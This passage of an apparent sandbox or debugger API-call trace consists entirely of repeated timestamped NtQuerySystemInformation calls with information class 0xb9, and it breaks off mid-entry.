(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x28, ResultLength=0x0) [0283.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.639] NtQuerySystemInformation (SystemInformationClass=0xb9, 